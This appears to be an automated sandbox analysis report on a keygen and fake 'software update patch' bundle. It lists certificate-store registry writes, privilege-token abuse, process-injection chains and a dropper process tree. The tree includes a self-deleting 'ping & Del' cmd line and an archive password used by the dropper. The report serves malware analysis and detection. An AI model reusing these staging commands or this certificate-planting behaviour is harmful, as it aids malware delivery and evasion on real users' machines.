tapinstall.exeoAKAmWkbAngMjKcBt.exevpn.tmpkahRa2R1.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 
04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e
0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 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 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 kahRa2R1.exe Set value (data) 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 oAKAmWkbAngMjKcBt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 tapinstall.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B oAKAmWkbAngMjKcBt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 kahRa2R1.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc
3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd36344
description       ioc                                                                                                                          process
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted)  oAKAmWkbAngMjKcBt.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43       tapinstall.exe
-
Runs ping.exe 1 TTPs 4 IoCs
Processes:
pid   process
4968  PING.EXE
2212  PING.EXE
1240  PING.EXE
7448  PING.EXE
-
Suspicious behavior: EnumeratesProcesses 62 IoCs
Processes:
pid   process
1196  Software-update-patc_535592163.tmp
1196  Software-update-patc_535592163.tmp
1088  Exercitationem.exe
1088  Exercitationem.exe
1088  Exercitationem.exe
1088  Exercitationem.exe
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
5024  Software-update-patc_988440081.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
2964  Zembra.exe
2964  Zembra.exe
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
4196  Software-update-patc_988440081.tmp
604   msiexec.exe
604   msiexec.exe
1844  mask_svc.exe
1844  mask_svc.exe
2964  Zembra.exe
2964  Zembra.exe
2964  Zembra.exe
2964  Zembra.exe
2964  Zembra.exe
2964  Zembra.exe
908   mask_svc.exe
908   mask_svc.exe
2964  Zembra.exe
2964  Zembra.exe
2336  Software-update-patc_612604768.tmp
2336  Software-update-patc_612604768.tmp
1604  mask_svc.exe
1604  mask_svc.exe
1604  mask_svc.exe
1604  mask_svc.exe
1604  mask_svc.exe
1604  mask_svc.exe
4336  Software-update-patc_612604768.tmp
4336  Software-update-patc_612604768.tmp
4080  Quibusdam.exe
4080  Quibusdam.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description                            pid   process
Token: SeSecurityPrivilege             604   msiexec.exe
Token: SeCreateTokenPrivilege          4880  oAKAmWkbAngMjKcBt.exe
Token: SeAssignPrimaryTokenPrivilege   4880  oAKAmWkbAngMjKcBt.exe
Token: SeLockMemoryPrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeIncreaseQuotaPrivilege        4880  oAKAmWkbAngMjKcBt.exe
Token: SeMachineAccountPrivilege       4880  oAKAmWkbAngMjKcBt.exe
Token: SeTcbPrivilege                  4880  oAKAmWkbAngMjKcBt.exe
Token: SeSecurityPrivilege             4880  oAKAmWkbAngMjKcBt.exe
Token: SeTakeOwnershipPrivilege        4880  oAKAmWkbAngMjKcBt.exe
Token: SeLoadDriverPrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeSystemProfilePrivilege        4880  oAKAmWkbAngMjKcBt.exe
Token: SeSystemtimePrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeProfSingleProcessPrivilege    4880  oAKAmWkbAngMjKcBt.exe
Token: SeIncBasePriorityPrivilege      4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreatePagefilePrivilege       4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreatePermanentPrivilege      4880  oAKAmWkbAngMjKcBt.exe
Token: SeBackupPrivilege               4880  oAKAmWkbAngMjKcBt.exe
Token: SeRestorePrivilege              4880  oAKAmWkbAngMjKcBt.exe
Token: SeShutdownPrivilege             4880  oAKAmWkbAngMjKcBt.exe
Token: SeDebugPrivilege                4880  oAKAmWkbAngMjKcBt.exe
Token: SeAuditPrivilege                4880  oAKAmWkbAngMjKcBt.exe
Token: SeSystemEnvironmentPrivilege    4880  oAKAmWkbAngMjKcBt.exe
Token: SeChangeNotifyPrivilege         4880  oAKAmWkbAngMjKcBt.exe
Token: SeRemoteShutdownPrivilege       4880  oAKAmWkbAngMjKcBt.exe
Token: SeUndockPrivilege               4880  oAKAmWkbAngMjKcBt.exe
Token: SeSyncAgentPrivilege            4880  oAKAmWkbAngMjKcBt.exe
Token: SeEnableDelegationPrivilege     4880  oAKAmWkbAngMjKcBt.exe
Token: SeManageVolumePrivilege         4880  oAKAmWkbAngMjKcBt.exe
Token: SeImpersonatePrivilege          4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreateGlobalPrivilege         4880  oAKAmWkbAngMjKcBt.exe
Token: SeDebugPrivilege                4536  vpn.tmp
Token: SeCreateTokenPrivilege          4880  oAKAmWkbAngMjKcBt.exe
Token: SeAssignPrimaryTokenPrivilege   4880  oAKAmWkbAngMjKcBt.exe
Token: SeLockMemoryPrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeIncreaseQuotaPrivilege        4880  oAKAmWkbAngMjKcBt.exe
Token: SeMachineAccountPrivilege       4880  oAKAmWkbAngMjKcBt.exe
Token: SeTcbPrivilege                  4880  oAKAmWkbAngMjKcBt.exe
Token: SeSecurityPrivilege             4880  oAKAmWkbAngMjKcBt.exe
Token: SeTakeOwnershipPrivilege        4880  oAKAmWkbAngMjKcBt.exe
Token: SeLoadDriverPrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeSystemProfilePrivilege        4880  oAKAmWkbAngMjKcBt.exe
Token: SeSystemtimePrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeProfSingleProcessPrivilege    4880  oAKAmWkbAngMjKcBt.exe
Token: SeIncBasePriorityPrivilege      4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreatePagefilePrivilege       4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreatePermanentPrivilege      4880  oAKAmWkbAngMjKcBt.exe
Token: SeBackupPrivilege               4880  oAKAmWkbAngMjKcBt.exe
Token: SeRestorePrivilege              4880  oAKAmWkbAngMjKcBt.exe
Token: SeShutdownPrivilege             4880  oAKAmWkbAngMjKcBt.exe
Token: SeDebugPrivilege                4880  oAKAmWkbAngMjKcBt.exe
Token: SeAuditPrivilege                4880  oAKAmWkbAngMjKcBt.exe
Token: SeSystemEnvironmentPrivilege    4880  oAKAmWkbAngMjKcBt.exe
Token: SeChangeNotifyPrivilege         4880  oAKAmWkbAngMjKcBt.exe
Token: SeRemoteShutdownPrivilege       4880  oAKAmWkbAngMjKcBt.exe
Token: SeUndockPrivilege               4880  oAKAmWkbAngMjKcBt.exe
Token: SeSyncAgentPrivilege            4880  oAKAmWkbAngMjKcBt.exe
Token: SeEnableDelegationPrivilege     4880  oAKAmWkbAngMjKcBt.exe
Token: SeManageVolumePrivilege         4880  oAKAmWkbAngMjKcBt.exe
Token: SeImpersonatePrivilege          4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreateGlobalPrivilege         4880  oAKAmWkbAngMjKcBt.exe
Token: SeCreateTokenPrivilege          4880  oAKAmWkbAngMjKcBt.exe
Token: SeAssignPrimaryTokenPrivilege   4880  oAKAmWkbAngMjKcBt.exe
Token: SeLockMemoryPrivilege           4880  oAKAmWkbAngMjKcBt.exe
Token: SeIncreaseQuotaPrivilege        4880  oAKAmWkbAngMjKcBt.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid   process
4556  Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe
1196  Software-update-patc_535592163.tmp
4880  oAKAmWkbAngMjKcBt.exe
5024  Software-update-patc_988440081.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
4536  vpn.tmp
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid   process
3552  Software-update-patc_579570356.sfx.exe
3552  Software-update-patc_579570356.sfx.exe
3552  MicrosoftEdge.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                        pid   process                             target process
PID 644 wrote to memory of 1196    644   Software-update-patc_535592163.exe  Software-update-patc_535592163.tmp
PID 644 wrote to memory of 1196    644   Software-update-patc_535592163.exe  Software-update-patc_535592163.tmp
PID 644 wrote to memory of 1196    644   Software-update-patc_535592163.exe  Software-update-patc_535592163.tmp
PID 1196 wrote to memory of 1088   1196  Software-update-patc_535592163.tmp  Exercitationem.exe
PID 1196 wrote to memory of 1088   1196  Software-update-patc_535592163.tmp  Exercitationem.exe
PID 1196 wrote to memory of 1088   1196  Software-update-patc_535592163.tmp  Exercitationem.exe
PID 1088 wrote to memory of 1312   1088  Exercitationem.exe                  UR1E1OJkSMSPSwU0.exe
PID 1088 wrote to memory of 1312   1088  Exercitationem.exe                  UR1E1OJkSMSPSwU0.exe
PID 1088 wrote to memory of 1312   1088  Exercitationem.exe                  UR1E1OJkSMSPSwU0.exe
PID 1312 wrote to memory of 4916   1312  UR1E1OJkSMSPSwU0.exe                UR1E1OJkSMSPSwU0.exe
PID 1312 wrote to memory of 4916   1312  UR1E1OJkSMSPSwU0.exe                UR1E1OJkSMSPSwU0.exe
PID 1312 wrote to memory of 4916   1312  UR1E1OJkSMSPSwU0.exe                UR1E1OJkSMSPSwU0.exe
PID 1312 wrote to memory of 4916   1312  UR1E1OJkSMSPSwU0.exe                UR1E1OJkSMSPSwU0.exe
PID 1312 wrote to memory of 4916   1312  UR1E1OJkSMSPSwU0.exe                UR1E1OJkSMSPSwU0.exe
PID 1088 wrote to memory of 4720   1088  Exercitationem.exe                  kahRa2R1.exe
PID 1088 wrote to memory of 4720   1088  Exercitationem.exe                  kahRa2R1.exe
PID 1088 wrote to memory of 4720   1088  Exercitationem.exe                  kahRa2R1.exe
PID 1088 wrote to memory of 4880   1088  Exercitationem.exe                  oAKAmWkbAngMjKcBt.exe
PID 1088 wrote to memory of 4880   1088  Exercitationem.exe                  oAKAmWkbAngMjKcBt.exe
PID 1088 wrote to memory of 4880   1088  Exercitationem.exe                  oAKAmWkbAngMjKcBt.exe
PID 1088 wrote to memory of 4024   1088  Exercitationem.exe                  vpn.exe
PID 1088 wrote to memory of 4024   1088  Exercitationem.exe                  vpn.exe
PID 1088 wrote to memory of 4024   1088  Exercitationem.exe                  vpn.exe
PID 4024 wrote to memory of 4536   4024  vpn.exe                             vpn.tmp
PID 4024 wrote to memory of 4536   4024  vpn.exe                             vpn.tmp
PID 4024 wrote to memory of 4536   4024  vpn.exe                             vpn.tmp
PID 1132 wrote to memory of 5024   1132  Software-update-patc_988440081.exe  Software-update-patc_988440081.tmp
PID 1132 wrote to memory of 5024   1132  Software-update-patc_988440081.exe  Software-update-patc_988440081.tmp
PID 1132 wrote to memory of 5024   1132  Software-update-patc_988440081.exe  Software-update-patc_988440081.tmp
PID 604 wrote to memory of 1788    604   msiexec.exe                         MsiExec.exe
PID 604 wrote to memory of 1788    604   msiexec.exe                         MsiExec.exe
PID 604 wrote to memory of 1788    604   msiexec.exe                         MsiExec.exe
PID 4720 wrote to memory of 2964   4720  kahRa2R1.exe                        Zembra.exe
PID 4720 wrote to memory of 2964   4720  kahRa2R1.exe                        Zembra.exe
PID 4720 wrote to memory of 2964   4720  kahRa2R1.exe                        Zembra.exe
PID 4880 wrote to memory of 1348   4880  oAKAmWkbAngMjKcBt.exe               msiexec.exe
PID 4880 wrote to memory of 1348   4880  oAKAmWkbAngMjKcBt.exe               msiexec.exe
PID 4880 wrote to memory of 1348   4880  oAKAmWkbAngMjKcBt.exe               msiexec.exe
PID 4916 wrote to memory of 2180   4916  UR1E1OJkSMSPSwU0.exe                cmd.exe
PID 4916 wrote to memory of 2180   4916  UR1E1OJkSMSPSwU0.exe                cmd.exe
PID 4916 wrote to memory of 2180   4916  UR1E1OJkSMSPSwU0.exe                cmd.exe
PID 2180 wrote to memory of 3052   2180  cmd.exe                             taskkill.exe
PID 2180 wrote to memory of 3052   2180  cmd.exe                             taskkill.exe
PID 2180 wrote to memory of 3052   2180  cmd.exe                             taskkill.exe
PID 604 wrote to memory of 2284    604   msiexec.exe                         MsiExec.exe
PID 604 wrote to memory of 2284    604   msiexec.exe                         MsiExec.exe
PID 604 wrote to memory of 2284    604   msiexec.exe                         MsiExec.exe
PID 4536 wrote to memory of 2188   4536  vpn.tmp                             cmd.exe
PID 4536 wrote to memory of 2188   4536  vpn.tmp                             cmd.exe
PID 4536 wrote to memory of 2188   4536  vpn.tmp                             cmd.exe
PID 2188 wrote to memory of 4208   2188  cmd.exe                             tapinstall.exe
PID 2188 wrote to memory of 4208   2188  cmd.exe                             tapinstall.exe
PID 3684 wrote to memory of 4196   3684  Software-update-patc_988440081.exe  Software-update-patc_988440081.tmp
PID 3684 wrote to memory of 4196   3684  Software-update-patc_988440081.exe  Software-update-patc_988440081.tmp
PID 3684 wrote to memory of 4196   3684  Software-update-patc_988440081.exe  Software-update-patc_988440081.tmp
PID 4536 wrote to memory of 3940   4536  vpn.tmp                             cmd.exe
PID 4536 wrote to memory of 3940   4536  vpn.tmp                             cmd.exe
PID 4536 wrote to memory of 3940   4536  vpn.tmp                             cmd.exe
PID 3940 wrote to memory of 3156   3940  cmd.exe                             tapinstall.exe
PID 3940 wrote to memory of 3156   3940  cmd.exe                             tapinstall.exe
PID 4388 wrote to memory of 912    4388  svchost.exe                         DrvInst.exe
PID 4388 wrote to memory of 912    4388  svchost.exe                         DrvInst.exe
PID 4388 wrote to memory of 1192   4388  svchost.exe                         DrvInst.exe
PID 4388 wrote to memory of 1192   4388  svchost.exe                         DrvInst.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software-update-patc_579570356.sfx.exe
"C:\Users\Admin\AppData\Local\Temp\Software-update-patc_579570356.sfx.exe"
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe
"C:\Users\Admin\Desktop\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe"
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
  -
  C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
    -
    C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
      -
      C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
        -
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
    -
    C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    -
    C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
    keygen-step-6.exe
    -
    C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
      -
      C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
        -
        C:\Windows\SysWOW64\PING.EXE
        ping 1.1.1.1 -n 1 -w 3000
        - Runs ping.exe
    -
    C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
      -
      C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"
        -
        C:\Users\Admin\Documents\PlsWnEU2.exe
        "C:\Users\Admin\Documents\PlsWnEU2.exe"
          -
          C:\Users\Admin\Documents\PlsWnEU2.exe
          C:\Users\Admin\Documents\PlsWnEU2.exe
      -
      C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
      -
      C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"
        -
        C:\Users\Admin\AppData\Roaming\525093.exe
        "C:\Users\Admin\AppData\Roaming\525093.exe"
        -
        C:\Users\Admin\AppData\Roaming\5704187.exe
        "C:\Users\Admin\AppData\Roaming\5704187.exe"
        -
        C:\Users\Admin\AppData\Roaming\3658051.exe
